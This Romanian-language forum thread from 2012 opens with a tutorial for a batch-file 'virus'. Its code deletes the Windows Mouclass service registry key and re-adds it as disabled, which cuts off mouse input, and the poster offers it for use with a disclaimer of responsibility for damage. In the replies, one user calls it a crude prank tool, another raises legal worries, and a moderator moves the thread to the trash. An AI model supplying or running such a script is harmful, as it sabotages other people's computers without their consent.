FiliBlox Posted November 6, 2012 Report Posted November 6, 2012 (edited) Un scurt tutorial despre cum se creeaza un virus care dezactiveaza mouse-ul.Va recomand sa nu il incercati pe voi.1)Deschide notepad si copiaza acest cod.rem ---------------------------------rem Disable Mouseset key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4rem ---------------------------------2)Salveaza fisierul cu numele Virus.Bat3)Virusul a fost creeat.ATENTIE ! Eu nu ma fac responsabil de daunele pe care le provocati voi.Acest tip de virus nu functioneaza pe noile sisteme Win xp sp2 - win 8SURSA:CHF,eu doar l-am tradus. Edited November 6, 2012 by FiliBlox Quote
yoyois Posted November 6, 2012 Report Posted November 6, 2012 mi se pare destul de stupid. Un bat simplu care opreste mouseul... parerea mea e ca ii lipsesc unele lucruri ca sa poata deveni un adevarat "virus" ... macar un spread...Cel putin la un nivel de baza(ca sa-ti prostestii prietenii) codul e bun. Quote
Che Posted November 6, 2012 Report Posted November 6, 2012 Nu o sa avem probleme daca postam chestii de astea ? Ma gandesc sa nu cumva sa se inchida forumul asa cum s-a inchis demonoid, megaupload si multe altele... Eu zic sa avem grija... Quote
Nytro Posted November 6, 2012 Report Posted November 6, 2012 Eu zic sa incercam sa ridicam nivelul forumului si sa nu mai postam cacaturi pentru copii de 12 ani.Se muta la gunoi. Quote